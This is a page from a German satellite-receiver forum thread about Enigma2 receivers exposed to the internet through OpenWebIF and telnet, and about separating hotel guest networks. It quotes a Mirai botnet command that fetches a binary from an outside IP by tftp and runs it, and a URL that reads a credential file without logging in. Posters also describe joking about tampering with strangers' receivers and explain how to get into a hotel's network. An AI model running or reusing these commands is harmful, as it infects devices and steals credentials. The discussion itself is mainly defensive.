Thanks Thanks:  51
Seite 7 von 8 ErsteErste ... 5678 LetzteLetzte
Ergebnis 61 bis 70 von 71
  1. #61
    Anfänger
    Registriert seit
    20.12.2016
    Beiträge
    28
    Total Downloaded
    8,04 MB
    Total Downloaded
    8,04 MB
    ReceiverDankeAktivitäten
    Box 1:
    Vu+ Duo 2
     
     
    Box 2:
    Golden Interstar LX3
     
     
    Box 3:
    Mutant HD2400
     
     
    @SpaceRat: Ich kenne den aktuellen Stand nicht und möchte nicht klugscheissen und kenne auch die Ziele nicht, aber hast du schon versucht die IPv4 in einen Integer zu wandeln? Damit denke ich ließe sich eine Subnetzprüfung auch per Hand realisieren (bzgl. Post #39). Für IPv6 wird's leider etwas komplizierter, da 16 Byte statt 4 Byte notwendig. Vielleicht ließe sich da mit den Präfixen etwas machen.

    Ich dachte immer, die Root-Authority sollte ein unabhängiger Host sein. Danke für die Info diesbezüglich.

    Wenn alle Ihre Boxen auf machen und per multicast senden, brauchen wir nur so viele Boxen wie Sender :-D.


    Gruß

    •   Alt Advertising

       

  2. #62
    Avatar von SpaceRat
    Registriert seit
    13.08.2013
    Ort
    Midgard
    Beiträge
    2.725
    Total Downloaded
    745,74 MB
    Total Downloaded
    745,74 MB
    ReceiverDankeAktivitäten
    Box 1:
    Vu+ Duo² 4x DVB-S2 OpenATV 6.1
     
     
    Box 2:
    AX QuadBox 2xDVB-S2 OpenATV 6.1
     
     
    Box 3:
    2x Vu+ Solo² OpenATV 6.1
     
     
    Box 4:
    Topfield TF7700 HDPVR HDMU
     
     
    Box 5:
    DVBViewer
     
     
    Zitat Zitat von Thatsmeme Beitrag anzeigen
    Kannst Du mir bitte meine Fragen beantworten bezüglich OpenWebIF ?
    Ich möchte meine Andeutungen zum "Sicherheitskonzept" mal etwas vertiefen, um das nicht so im Raum stehen zu lassen:

    Was Ihr braucht, sind mindestens drei getrennte Netze:

    1. Ein notorisch unsicheres, das WLAN für Gäste und - sofern vorhanden - Netzwerkdosen mit Zugriff durch die Gäste
    2. Ein - je nach Gegebenheiten - als nicht wirklich sicher zu betrachtendes, in dem sich die weniger sicherheitskritischen Geräte befinden, die den Gästen zwar zur Verfügung stehen, an denen sie aber nicht rumfummeln sollen, es aber durchaus könnten.
      Beispiele wären z.B. die Receiver, aber auch Tablets o.ä., welche vom Personal durch's Haus geschleppt werden.
    3. Ein sicheres. für die PCs im Büro, Kassenterminal, usw.


    Ggf. käme natürlich noch ein 4. hinzu, wenn - insbesondere in einem größeren Haus - bestimmte Büro-Bereiche von anderen getrennt sein sollen, z.B. das Management vom gemeinen Fußvolk
    Das Ganze läßt sich durchaus auch kostengünstig realisieren, ein einzelner handelsüblicher Router mit LEDE/OpenWrt-Firmware kann als Access Point für zwei oder drei verschiedene WLANs herhalten.
    Receiver/TV:
    • Vu+ Duo² 4xDVB-S2 / 2x-C / 1.8TB / OpenATV 6.1@Samsung 50" Plasma
    • AX QuadBox HD2400 2xDVB-S2 / 2x-C / 930 GB / OpenATV 6.1@Samsung 32" TFT
    • 2x Vu+ Solo² / OpenATV 6.1
    • S2-Twin-Tuner PCIe@Samsung SyncMaster T240HD (PC)
    • TechniSat SkyStar HD 2 (2.PC)
    Pay-TV: Schwarzfunk, Redlight HD Mega, XXL, HD-, Sky
    Internet: Unitymedia 1play 100 / Cisco EPC3212 + Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)

  3. Thanks HD75hd bedankten sich
  4. #63
    Senior Mitglied
    Registriert seit
    05.03.2016
    Beiträge
    575
    Total Downloaded
    0
    Total Downloaded
    0
    ReceiverDankeAktivitäten
    Box 1:
    OSmini S2+S2 mit openATV 5.3 vom 06.10.2016
     
     
    Hier noch eine Frage, auch wenn Sie vielleicht nicht direkt zum Forum passt:

    Das Thema der getrennten Netzebenen plane ich auch gerade durch. Stickwort ist das Gäste-WLAN. Das Gäste-Netz möchte ich dafür als eigenes Subnetz mit Router aufgebaut und das private Netz "dahinter". (Also: WAN des privaten Netzes an das LAN des Gäste-Netzes.)

    Wo wäre bei einem solchen Netz der Receiver am besten aufgehoben? Im Gäste-Netz? Da ich vom privaten Netz auf das Gäste-Netz zugreifen kann, müsste ich so auch an den Receiver kommen. Der Receiver steht zwar dann etwas unsicherer, aber lieber der als mein gesamtes privates Netz.

  5. #64
    Avatar von SpaceRat
    Registriert seit
    13.08.2013
    Ort
    Midgard
    Beiträge
    2.725
    Total Downloaded
    745,74 MB
    Total Downloaded
    745,74 MB
    ReceiverDankeAktivitäten
    Box 1:
    Vu+ Duo² 4x DVB-S2 OpenATV 6.1
     
     
    Box 2:
    AX QuadBox 2xDVB-S2 OpenATV 6.1
     
     
    Box 3:
    2x Vu+ Solo² OpenATV 6.1
     
     
    Box 4:
    Topfield TF7700 HDPVR HDMU
     
     
    Box 5:
    DVBViewer
     
     
    Welches Szenario?

    Privat ist das mit dem getrennten Netzwerk für die Receiver Blödsinn.
    Es geht darum, wenn man fremde Leute in einem Netz hat, wie z.B. in einem Hotel-WLAN.

    In einem Hotel-WLAN würde ich kein einziges eigenes Gerät positionieren (Jetzt mal von Router, AP und Switches abgesehen).
    Receiver/TV:
    • Vu+ Duo² 4xDVB-S2 / 2x-C / 1.8TB / OpenATV 6.1@Samsung 50" Plasma
    • AX QuadBox HD2400 2xDVB-S2 / 2x-C / 930 GB / OpenATV 6.1@Samsung 32" TFT
    • 2x Vu+ Solo² / OpenATV 6.1
    • S2-Twin-Tuner PCIe@Samsung SyncMaster T240HD (PC)
    • TechniSat SkyStar HD 2 (2.PC)
    Pay-TV: Schwarzfunk, Redlight HD Mega, XXL, HD-, Sky
    Internet: Unitymedia 1play 100 / Cisco EPC3212 + Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)

  6. #65
    Avatar von SpaceRat
    Registriert seit
    13.08.2013
    Ort
    Midgard
    Beiträge
    2.725
    Total Downloaded
    745,74 MB
    Total Downloaded
    745,74 MB
    ReceiverDankeAktivitäten
    Box 1:
    Vu+ Duo² 4x DVB-S2 OpenATV 6.1
     
     
    Box 2:
    AX QuadBox 2xDVB-S2 OpenATV 6.1
     
     
    Box 3:
    2x Vu+ Solo² OpenATV 6.1
     
     
    Box 4:
    Topfield TF7700 HDPVR HDMU
     
     
    Box 5:
    DVBViewer
     
     
    Ich möchte den Hoteliers mal ein bißchen die Zähne ziehen:

    Ich habe in meiner Notebook-Tasche auch immer ein Netzwerkkabel dabei, was sehr praktisch ist, weil ich auch schon in einem Hotel zwar Gratis-Internet, aber wirklich nur per Kabel und nicht per WLAN hatte.

    Wenn ich häufiger in Hotels unterwegs wäre, dann hätte ich heutzutage garantiert sogar einen Router dabei. Allein schon, um ihn in dem Fall wie o.g. (Internet per Netzwerkdose) als Access Point für mein Smartphone aufsetzen zu können.
    Die gibt's inzwischen im Hosentaschenformat: GL-AR150 Mini WiFi router, IoT, OpenWrt pre-installed, Repeater, OpenVpn


    Nichts hindert mich bei OpenWrt/LEDE daran, die beiden Netzwerkports einfach zu bridgen, dann kann ich mich prinzipiell problemlos zwischen eine Netzwerkdose und das vorhandene Gerät - z.B. einen E2-Receiver - klemmen und bin über WLAN im selben Netzwerk wie der E2-Receiver.
    Wenn ich dann Langeweile habe - und die habe ich außerhalb meiner heimischen "Kommandozentrale" sehr schnell - dann würde ich natürlich auch mal gucken, was sonst noch so im Netzwerk abgeht.
    Jetzt bin ich eher der harmlose Typ und will ja gar nix kaputtmachen, also würde ich vermutlich lediglich meinen Dream Player auf dem Smartphone für den dort stehenden E2-Receiver einrichten, einfach nur, weil's geht.

    Destruktivere Charaktere könnten aber auf die Idee kommen, anderen Gästen mal die Programme umzuschalten, dem Nachbarn die Lautstärke runterdrehen, ...

    Ich war auch einmal mit meiner Frau in einem Tagungshotel und die Tagungen betrafen meine Frau. Auch da hatte ich natürlich chronische Langeweile, denn in dem Kaff fühlen sich nur Rentner wohl. Beim Fernsehen gab es aber das Problem, daß die Lautstärke auf einen viel zu niedrigen Wert begrenzt war, auf dem Bett liegend konnte man wirklich kein einziges Wort mehr verstehen und ich bin weiß Gott nicht schwerhörig.
    Ihr glaubt doch wohl, daß ich mal gegoogelt habe, wie man bei LG-Fernsehern den Hotel-Modus deaktiviert ...
    ... den Rest des Aufenthaltes konnten wir dann vernünftig fernsehen und auch was dabei verstehen.
    Receiver/TV:
    • Vu+ Duo² 4xDVB-S2 / 2x-C / 1.8TB / OpenATV 6.1@Samsung 50" Plasma
    • AX QuadBox HD2400 2xDVB-S2 / 2x-C / 930 GB / OpenATV 6.1@Samsung 32" TFT
    • 2x Vu+ Solo² / OpenATV 6.1
    • S2-Twin-Tuner PCIe@Samsung SyncMaster T240HD (PC)
    • TechniSat SkyStar HD 2 (2.PC)
    Pay-TV: Schwarzfunk, Redlight HD Mega, XXL, HD-, Sky
    Internet: Unitymedia 1play 100 / Cisco EPC3212 + Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)

  7. #66
    Senior Mitglied
    Registriert seit
    30.11.2013
    Beiträge
    129
    Total Downloaded
    4,84 MB
    Total Downloaded
    4,84 MB
    ReceiverDankeAktivitäten
    Echt Wahnsinn das da noch alles offen ist.

    Da sieht man zB einen der über die Feiertage Pornos laufen hat und teilweise sind da 4 Jahre alte Images am laufen. Sollte jemand über das WebIF an eine Shell kommen haben die wirklich ein Problem dann kann ich im lokalen Netz überall hin wo ich möchte.

    PS LOL
    http://xxxx/file?file=/etc/CCcam.cfg
    Geändert von DocSnyd3r (06.01.2017 um 20:02 Uhr)

  8. #67
    Avatar von SpaceRat
    Registriert seit
    13.08.2013
    Ort
    Midgard
    Beiträge
    2.725
    Total Downloaded
    745,74 MB
    Total Downloaded
    745,74 MB
    ReceiverDankeAktivitäten
    Box 1:
    Vu+ Duo² 4x DVB-S2 OpenATV 6.1
     
     
    Box 2:
    AX QuadBox 2xDVB-S2 OpenATV 6.1
     
     
    Box 3:
    2x Vu+ Solo² OpenATV 6.1
     
     
    Box 4:
    Topfield TF7700 HDPVR HDMU
     
     
    Box 5:
    DVBViewer
     
     
    Zitat Zitat von DocSnyd3r Beitrag anzeigen
    Echt Wahnsinn das da noch alles offen ist.
    Da sieht man zB einen der über die Feiertage Pornos laufen hat
    Die hat der nur laufen, weil ich ihm diese Sender immer wieder einstelle


    Wieviele brauchst Du?

    Ich bin zufällig auch auf einen offenen oscam gestoßen.
    Receiver/TV:
    • Vu+ Duo² 4xDVB-S2 / 2x-C / 1.8TB / OpenATV 6.1@Samsung 50" Plasma
    • AX QuadBox HD2400 2xDVB-S2 / 2x-C / 930 GB / OpenATV 6.1@Samsung 32" TFT
    • 2x Vu+ Solo² / OpenATV 6.1
    • S2-Twin-Tuner PCIe@Samsung SyncMaster T240HD (PC)
    • TechniSat SkyStar HD 2 (2.PC)
    Pay-TV: Schwarzfunk, Redlight HD Mega, XXL, HD-, Sky
    Internet: Unitymedia 1play 100 / Cisco EPC3212 + Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)

  9. Thanks sgs bedankten sich
  10. #68
    Senior Mitglied
    Registriert seit
    30.11.2013
    Beiträge
    129
    Total Downloaded
    4,84 MB
    Total Downloaded
    4,84 MB
    ReceiverDankeAktivitäten
    517 cd /var/tmp;cd /tmp;rm -f *;tftp -l 7up -r 7up -g 89.33.64.118;chmod a+x 7up;./7up
    518 system
    519 /bin/busybox MIRAI

    Telnet scheint auch ein Problem ich weiß jetzt ganicht ob da bei einem neuen Image ein Passwort gesetzt wird?

    Ansonsten wird man wie man da sieht auch schnell mal Mitglied in einem Botnet.

  11. #69
    Avatar von SpaceRat
    Registriert seit
    13.08.2013
    Ort
    Midgard
    Beiträge
    2.725
    Total Downloaded
    745,74 MB
    Total Downloaded
    745,74 MB
    ReceiverDankeAktivitäten
    Box 1:
    Vu+ Duo² 4x DVB-S2 OpenATV 6.1
     
     
    Box 2:
    AX QuadBox 2xDVB-S2 OpenATV 6.1
     
     
    Box 3:
    2x Vu+ Solo² OpenATV 6.1
     
     
    Box 4:
    Topfield TF7700 HDPVR HDMU
     
     
    Box 5:
    DVBViewer
     
     
    Telnet ist in allen oe-a-Images seit Anfang/Mitte Dezember nicht mehr nach außen zu öffnen, selbst wenn man ein Port-Forward im Router anlegt.

    Gesendet von meinem Siemens C25 mit Tapatalk
    Receiver/TV:
    • Vu+ Duo² 4xDVB-S2 / 2x-C / 1.8TB / OpenATV 6.1@Samsung 50" Plasma
    • AX QuadBox HD2400 2xDVB-S2 / 2x-C / 930 GB / OpenATV 6.1@Samsung 32" TFT
    • 2x Vu+ Solo² / OpenATV 6.1
    • S2-Twin-Tuner PCIe@Samsung SyncMaster T240HD (PC)
    • TechniSat SkyStar HD 2 (2.PC)
    Pay-TV: Schwarzfunk, Redlight HD Mega, XXL, HD-, Sky
    Internet: Unitymedia 1play 100 / Cisco EPC3212 + Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)

  12. Thanks DocSnyd3r bedankten sich
  13. #70
    Senior Mitglied
    Registriert seit
    06.04.2013
    Beiträge
    449
    Total Downloaded
    1,21 GB
    Total Downloaded
    1,21 GB
    ReceiverDankeAktivitäten
    Box 1:
    Mut@nt HD2400 mit 5.3 openATV
     
     
    Box 2:
    Vu+ SoloSE V2 mit Vti 11.0.1
     
     
    Servus,

    Ei dem vielen Fachchinesisch mal eine Frage. Was sollte man denn nun einstellen im Webif und wo? Nutze Webif um mal schnell was nachzuschauen wenn ich zuhause im WLAN bin. Wie schütze ich das denn dann nun gegen außen?

    Bg, Chris.


Seite 7 von 8 ErsteErste ... 5678 LetzteLetzte

Stichworte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Diese Website benutzt Cookies
Wir benutzen Cookies um Sitzungsinformationen zu speichern. Dies erleichtert es uns z.B. Dich an Deine Login zu erinnern, Einstellungen der Webseite zu speichern, Inhalte und Werbung zu personalisieren, Social Media Funktionen anzubieten und unser Datenaufkommen zu analysieren. Wir teilen diese Informationen ebenfalls mit unseren Social Media-, Werbe- und Analysepartnern.
     
Alle Zeitangaben in WEZ +1. Es ist jetzt 11:52 Uhr.
Powered by vBulletin® Version 4.2.5 (Deutsch)
Copyright ©2018 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.
Resources saved on this page: MySQL 11,11%
Parts of this site powered by vBulletin Mods & Addons from DragonByte Technologies Ltd. (Details)
vBulletin Skin By: PurevB.com